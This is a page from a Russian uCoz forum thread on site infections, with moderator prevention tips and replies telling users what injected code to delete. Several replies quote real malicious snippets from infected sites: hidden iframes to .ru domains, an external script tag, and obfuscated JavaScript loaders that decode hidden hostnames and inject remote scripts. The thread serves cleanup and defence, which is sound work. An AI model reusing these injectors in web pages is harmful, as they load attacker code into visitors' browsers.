Страница 144 из 149«12142143144145146148149»
Модератор форума: webanet 
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2146 | 17:24:50
    Soln, отмените минимальный. остаток неиспользованных средств в течении 15 минут вернется на лицевой счет сайта. далее активируйте оптимальный
    Цитата
    Можно ещё вопрос.
    эта тема не для вопросов по дизайну

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    meleho68
    Сообщений: 2
    Репутация: 0

    Сообщение # 2147 | 20:00:39
    Добрый день. Я учитель. Создала сайт для конкурса, вроде ничего лишнего, но Касперский не пускает на сайт, "Содержит легальную программу, которая может быть использована злоумышленником..." Другие антивирусы не видят проблемм. Адрес: http://melehovaelena.ucoz.net/. Заранее спасибо за ответ.
    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2148 | 20:12:39
    meleho68, ваш сайт заражен. и браузер того, кто занимается правками шаблонов сайта. панель управления - дизайн - управление дизайном - глобальные блоки - верхняя часть сайта - ищите ифреймы и длинные скрипты перед ними
    ифремы выглядят так
    Код
    <iframe id="a1996667054" src="https://ec2f1xubcblb.ru/f2.html?a=27532" style="display: none;"></iframe>

    Код
    <iframe id="a754394637" src="https://3o9cpydyue4s8.ru/u.html?a=27532" style="display: none;"></iframe>

    длинный код начинается с <script> и заканчивается </script> ифреймы повторяются 32 раза
    это все надо удалить и сохранить шаблон
    далее из блока случайное фото удалить тоже самое. браузер полностью переустановить с удалением всех профилей

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    meleho68
    Сообщений: 2
    Репутация: 0

    Сообщение # 2149 | 20:32:57
    Спасибо, будем работать.
    Вера2929
    Сообщений: 63
    Репутация: 6

    Сообщение # 2150 | 10:30:38
    Прикрепления: 7233869.jpg(210Kb)
    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2151 | 18:46:30
    Вера2929, удалите скрипт
    Код
    <script src="http://activiks.ru/img/png.js" type="text/javascript"></script>
    из информера форума

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    petrovna2106
    Сообщений: 4
    Репутация: 7

    Сообщение # 2152 | 15:58:41
    После загрузки безобидной картинки о ПДД школьный сайт sch14.ucoz был заблокирован: Запрещено: not-a-virus:HEUR:AdWare.Script.Generic 19.02.2017 19:32:18
    Научите, спасите, помогите вернуть сайт
    Зайти в ПУ могу. не знаю только что там удалить
    Сообщение отредактировал petrovna2106 - Воскресенье, 19 Фев 2017, 16:00:45
    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2153 | 16:51:34
    petrovna2106, браузер с которого добавили невинную картинку заражен
    панель управления - редактор страниц - управление страницами сайта - главная страница - напротив главной жмите на разводной ключ - страница откроется на редактирование - ищите и удаляйте вот такой длинный код
    Код
    <script>window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19831",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "sch14.ucoz.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script><iframe src="//ubnsyhv27fa2j.ru/f.html" style="display: none;" id="a1996667054"></iframe>

    браузер с которого редактировался сайт полностью переустановить с удалением профилей

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Amitofu
    Сообщений: 16
    Репутация: 6

    Сообщение # 2154 | 10:00:11
    Сайт http://astro-ru.ru В модуле "страницы сайта" стал подгружаться какой-то скрипт, направляющий на страницу http://www.hidrolife.com.mx/wp-content/jquery/jquery.min.js?kfmlwfw Яндекс считает это фишингом.
    Проверил коды на сайте, нигде этого скрипта нет. Не могу разобраться в чем проблема.
    То же самое на сайтах http://smartwebsite.ru и http://astrodama.ru и именно в модуле "страницы сайта".
    Сообщение отредактировал Amitofu - Понедельник, 20 Фев 2017, 10:03:09
    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2155 | 13:33:15
    Amitofu, по сайту http://astro-ru.ru/ удалить скрипт
    Код
    <script>var _0xec54=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x73\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x78\x4D\x4D\x38\x52\x37\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xec54[25]](_0xec54[0]+ _0xec54[1]+ _0xec54[2]+ _0xec54[3]+ _0xec54[4]+ _0xec54[5]+ _0xec54[6]+ _0xec54[7]+ _0xec54[8]+ _0xec54[9]+ _0xec54[10]+ _0xec54[11]+ _0xec54[12]+ _0xec54[13]+ _0xec54[14]+ _0xec54[15]+ _0xec54[16]+ _0xec54[17]+ _0xec54[18]+ _0xec54[19]+ _0xec54[20]+ _0xec54[1]+ _0xec54[2]+ _0xec54[21]+ _0xec54[22]+ _0xec54[23]+ _0xec54[24])</script>

    в самом низу шаблона
    сайт http://smartwebsite.ru/ удалить скрипт вверху шаблона
    Код
    <script type="text/javascript">
    var _0xec54=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x73\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x78\x4D\x4D\x38\x52\x37\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xec54[25]](_0xec54[0]+ _0xec54[1]+ _0xec54[2]+ _0xec54[3]+ _0xec54[4]+ _0xec54[5]+ _0xec54[6]+ _0xec54[7]+ _0xec54[8]+ _0xec54[9]+ _0xec54[10]+ _0xec54[11]+ _0xec54[12]+ _0xec54[13]+ _0xec54[14]+ _0xec54[15]+ _0xec54[16]+ _0xec54[17]+ _0xec54[18]+ _0xec54[19]+ _0xec54[20]+ _0xec54[1]+ _0xec54[2]+ _0xec54[21]+ _0xec54[22]+ _0xec54[23]+ _0xec54[24]);
    var browser = navigator.userAgent;
    var browserRegex = /(Android|BlackBerry|IEMobile|Nokia|iP(ad|hone|od)|Opera M(obi|ini))/;
    var isMobile = false;
    if(browser.match(browserRegex)) {
    isMobile = true;
    addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
    function hideURLbar(){
    window.scrollTo(0,1);
    }
    }
    </script>

    сайт http://astrodama.ru/ удалите скрипт в самом верху шаблонов
    Код
    <script type="text/javascript">
    var _0xec54=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x73\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x78\x4D\x4D\x38\x52\x37\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xec54[25]](_0xec54[0]+ _0xec54[1]+ _0xec54[2]+ _0xec54[3]+ _0xec54[4]+ _0xec54[5]+ _0xec54[6]+ _0xec54[7]+ _0xec54[8]+ _0xec54[9]+ _0xec54[10]+ _0xec54[11]+ _0xec54[12]+ _0xec54[13]+ _0xec54[14]+ _0xec54[15]+ _0xec54[16]+ _0xec54[17]+ _0xec54[18]+ _0xec54[19]+ _0xec54[20]+ _0xec54[1]+ _0xec54[2]+ _0xec54[21]+ _0xec54[22]+ _0xec54[23]+ _0xec54[24]);
    var browser = navigator.userAgent;
    var browserRegex = /(Android|BlackBerry|IEMobile|Nokia|iP(ad|hone|od)|Opera M(obi|ini))/;
    var isMobile = false;
    if(browser.match(browserRegex)) {
    isMobile = true;
    addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
    function hideURLbar(){
    window.scrollTo(0,1);
    }
    }
    </script>

    далее лечимся по схеме

    далее все сайты переведите на индивидуальный пароль в панели управления. панель управления - безопасность - изменить пароль аккаунта - переведите на отдельный пароль и каждому сайту задайте разные пароли. далее на каждом сайте удалите всех администраторов и модераторов и даже себя удалите из администраторов. в панели управления для каждого сайта создайте локальный профиль (для каждого сайта разные пароли) и будете входить на сайт через адрес вашсайт/admin
    САМОЕ ГЛАВНОЕ. НА ВСЕХ САЙТАХ СМЕНИТЬ ПАРОЛЬ К ФТП
    запоминать пароли к фтп не надо, поэтому поставьте самые сложные из возможных что-то типа fklgjfdjgdf9er8t93th5keigu
    далее будете смотреть. если после всех мероприятий появится снова. опять обязательно пишите

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Amitofu
    Сообщений: 16
    Репутация: 6

    Сообщение # 2156 | 14:31:21
    webanet, Огромное спасибо! Единственное, не совсем понял про создание локального профиля. Что для этого нужно сделать?
    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2157 | 14:44:42
    Amitofu, панель управления - пользователи - добавить пользователя. там создадите нового пользователя. его назначите администратором и входить будете данными нового пользователя. (логин и пароль) всех остальных пользователей администраторов переведите в группу пользователи. пароли ставить максимально сложные

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Amitofu
    Сообщений: 16
    Репутация: 6

    Сообщение # 2158 | 14:49:53
    Цитата webanet ()
    Amitofu, панель управления - пользователи - добавить пользователя. там создадите нового пользователя. его назначите администратором и входить будете данными нового пользователя. (логин и пароль) всех остальных пользователей администраторов переведите в группу пользователи. пароли ставить максимально сложные
    Еще раз огромное спасибо за помощь!
    Марго3073
    Сообщений: 2
    Репутация: 0

    Сообщение # 2159 | 12:10:18
    Привет! Подскажите, пожалуйста! У меня на сайте http://margaritashever.ucoz.ru/ вчера и сегодня неожиданная активность - 150 - 200 гостей. Но на хостах это никак не отражается. Я понимаю, что это не мной так заинтересовались :). А что тогда? Может, вирус?
    webanet
    Личный менеджер
    Сообщений: 23222
    Репутация: 4879

    Сообщение # 2160 | 20:05:38
    Марго3073, к вирусам подобное не относится

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Страница 144 из 149«12142143144145146148149»
    Поиск: